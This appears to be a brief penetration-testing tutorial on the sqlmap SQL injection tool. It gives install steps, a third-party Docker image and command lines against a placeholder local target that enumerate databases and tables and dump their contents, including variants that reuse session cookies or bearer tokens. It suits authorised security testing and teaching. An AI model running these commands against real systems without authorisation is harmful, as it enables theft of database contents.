SQL injection tool – sqlmap


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. more here: http://sqlmap.org/

Installation

apt-get install -y sqlmap

Docker image with pre installed tool

– https://hub.docker.com/r/szalek/pentest-tools/

docker pull szalek/pentest-tools
docker run -it szalek/pentest-tools

Target

– http://target.localhost/rest/ws-user-account.php?username=szalek

Sqlmap basic

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE-NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE_NAME} --dump

with cookie

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs

with header

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs